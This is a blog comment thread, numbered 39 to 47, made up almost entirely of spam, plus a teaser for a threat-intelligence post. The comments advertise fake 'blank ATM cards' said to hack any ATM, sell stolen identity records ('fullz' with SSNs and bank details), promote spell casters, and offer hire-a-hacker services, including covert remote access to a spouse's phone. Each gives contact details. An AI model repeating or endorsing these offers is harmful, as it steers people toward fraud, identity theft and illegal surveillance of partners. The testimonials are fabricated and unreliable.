  39. Hello Guys!!! I am belinda. I live in Ottawa,Canada. I am very excited today and do not know where to start my testimony from. I lost my job a month ago and things had been tough for me as a mother. I had 3 kids and found it difficult to pay my bills and feed my kids. My husband left me and the kids for another woman and ever since then we were living in pain and hunger but just few days ago I came across a testimony of a man who got a blank ATM card from Mr.Alexander so I immediately contacted him for the same type of ATM card and I am very happy to announce to the world that I am living a fulfilled life. This blank ATM card can withdraw up to 10,000 dollars and more daily without you having any account with any bank. Now I can proudly say I'm rich. I have been able to buy a house,start my business and I have enough money for my family. Contact Mr.Alexander today to get your card via his email address:[email protected]

    ReplyDelete
  40. Hello Guys!!! I am belinda. I live in Ottawa,Canada. I am very excited today and do not know where to start my testimony from. I lost my job a month ago and things had been tough for me as a mother. I had 3 kids and found it difficult to pay my bills and feed my kids. My husband left me and the kids for another woman and ever since then we were living in pain and hunger but just few days ago I came across a testimony of a man who got a blank ATM card from Mr.Alexander so I immediately contacted him for the same type of ATM card and I am very happy to announce to the world that I am living a fulfilled life. This blank ATM card can withdraw up to 10,000 dollars and more daily without you having any account with any bank. Now I can proudly say I'm rich. I have been able to buy a house,start my business and I have enough money for my family. Contact Mr.Alexander today to get your card via his email address:[email protected]

    ReplyDelete
  41. BE SMART AND BECOME RICH IN LESS THAN 3DAYS It all depends on how fast 
    you can be to get the new PROGRAMMED blank ATM card that is capable of
    hacking into any ATM machine, anywhere in the world. I got to know about 
    this BLANK ATM CARD when I was searching for job online about a month 
    ago It has really changed my life for good and now I can say I'm rich and 
    I can never be poor again. The least money I get in a day with it is about 
    $50,000.(fifty thousand USD) Every now and then I keeping pumping money 
    into my account. Though is illegal,there is no risk of being caught 
    ,because it has been programmed in such a way that it is not traceable,it 
    also has a technique that makes it impossible for the CCTVs to detect 
    you. For details on how to get yours today, email the hackers on :
    [email protected] Tell your 
    loved once too, and start to live large. That's the simple testimony of how 
    my life changed for good. Love you all . the email address again is
    [email protected]

    ReplyDelete
  42. Selling USA FRESH SPAMMED SSN Leads/Fullz, along with Driving License/ID Number with EXCELLENT connectivity.

    **PRICE**
    >>2$ FOR EACH LEAD/FULLZ/PROFILE
    >>5$ FOR EACH PREMIUM LEAD/FULLZ/PROFILE

    >All Leads are Tested & Verified.
    >Invalid info found, will be replaced.
    >Serious buyers will be welcome & will give discounts to them.
    >Fresh spammed data of USA Credit Bureau
    >Good credit Scores, 700 minimum scores.

    Email > [email protected]
    Telegram > @leadsupplier
    ICQ > 752822040

    **DETAILS IN EACH LEAD/FULLZ**

    ->FULL NAME
    ->SSN
    ->DATE OF BIRTH
    ->DRIVING LICENSE NUMBER WITH EXPIRY DATE
    ->ADDRESS WITH ZIP
    ->PHONE NUMBER, EMAIL, I.P ADDRESS
    ->EMPLOYEE DETAILS
    ->REALTIONSHIP DETAILS
    ->MORTGAGE INFO
    ->BANK ACCOUNT DETAILS

    ->Bulk order will be preferable
    ->Minimum order 25 to 30 leads/fullz
    ->Hope for the long term business
    ->You can asked for specific states & zips
    ->You can demand for samples if you want to test
    ->Data will be given with in few mins after payment received
    ->Payment mode BTC, PAYPAL & PERFECT MONEY

    **Contact 24/7**

    Email > [email protected]
    Telegram > @leadsupplier
    ICQ > 752822040

    ReplyDelete
  43. How I Got My Ex Husband Back. Am so excited, All Thanks goes to Dr Prince i was married to my husband, and we were living fine and happy. it come to an extend that my husband that use to love and care for me, doesn't have my time again, until i fined at that he was having an affair with another woman, I tried to stop him all my effort was in-vain suddenly he divorce me and went for the woman. he live me with two of our kids, I cried all day, I was in pains, sorrow and looking for help. I read a comment on how Dr Prince helped a lady to brought her husband back, after 2yrs , He helped people with his Magic spell love and reuniting spell. so I decided to contact him and explain my problems to him, he did a love spell that made my husband to come back to me and never think of the woman. this man is God sent to restore heart break and reunite relationship. may the lord be your strength and continue to use you to save people relationship and any problems contact him for help on [email protected] You can also contact him through his WhatsApp +19492293867. Contact him now for love spell to bring back your ex lover he is the best spell caster and he is the best solution to all relationship problems…

    ReplyDelete
  44. I can vouch for him because I have used him to monitor my husband many time when I feel suspicious about his movements TALENTED HACKERS DO YOU REQUIRE A CERTIFIED HACKER FOR : +University grades hack, +Bank account hacks, +Control devices remotely hack, +Facebook Hacking Tricks, +Gmail, AOL, Yahoomail, inbox, hack are available, +Database hacking, +PC computer tricks +Bank transfer, Western Union, money gram, Credit Card transfer +Wiping of credit, +VPN software, +ATM Hack we are the real deal when it comes to hacking, carding, WU transfer, Money Gram transfer etc contact us now on : [email protected] him for all kind of hacking job and you will be glad you did whatsapp+12132951376

    ReplyDelete

  45. Getting your lover or your ex back has been made more easy by this powerful spell caster called Dr Odion. I am Rose by name and i am from canada, the only reason why i am on this site is to thank this powerful spell caster called DR. Odion and you can improve your relationship success by contacting him through these details (wisdomspiritu[email protected] Or call +2348136482342) This powerful spell caster did me a huge favor by helping me get my lover back to me within the speed of light and since then my relationship has been perfect.

    any problem of yours.He is specialized in the following:

    (1)Spell for protection from danger
    (2)Spell for magic
    (3)Spell for same sex love
    (4)Spell for healing
    (5)Spell for invisibility
    (6)Spell for riches and fame
    (7)Spell to get a good job
    (8)Spell for strong love and relationship
    (9)Spell to bring your ex back
    (10)speII for Lottery
    This man has great powers and is incredibly generous.You can contact him on
    ([email protected])

    ReplyDelete
  46. Hello everyone. I want to share my amazing experience with the great spell caster Dr.Ogudugu my husband was cheating on me and when I found out we had a fight which lead him filling for a divorce I cried and fell sick when I was searching about love quotes online I saw people talking about Dr.Ogudugu and his great work whose case was similar to mine they left his contact info I contacted Dr.Ogudugu and he told me not to worry that after 24 hours he will cancel the divorce and my husband will be back to me after I did everything he asked me to do to my greatest surprise the next day evening it was my husband he knelt down begging me to accept him back, thank you once again Dr.Ogudugu you are indeed a blessing to me he can also help you. Contact Dr.Ogudugu through his email address on: [email protected]

    ReplyDelete
  47. I started suspecting my wife when we returned from our vacation in Seychelles. When we got back home, her behavior changed and I noticed she was spending more time with her phone than paying attention to our family. I didn't pay attention to it at first but I became worried when it was getting too much. I know my wife very well, I just didn't have any proof to back up these things. Her phone was always locked with password, I became weak and worried so much. I wanted to know what was going on. I knew if I confronted her, she would deny it and further put a strain on our marriage. So what did I do? I got referred by a colleague with this great IT expert she met on here (([email protected]). They helped me hack her phone remotely without physical access to the phone, all they required for was her phone number. This got me full access to her phone, basically I was seeing the same thing my spouse was seeing on the phone, it’s like a "mirror phone". The hack was completed in less than 24 hours, he told me about all the packages offered including a refund if I was not satisfied with any of their services. Honestly I must say, I was way more satisfied than I initially expected. This hack helped me make my decisions concerning where our relationship was headed many thanks to ([email protected] . You can text him at (nine zero four) four one seven seven two one four, A word is enough for the wise Whatsapp +1(509)590-1051([email protected]

    ReplyDelete

The Gh0st Remains the Same

Author:  Danny Adamitis   Executive Summary  Prevailion’s Tailored Intelligence Team has detected a new advanced campaign dubbed - “...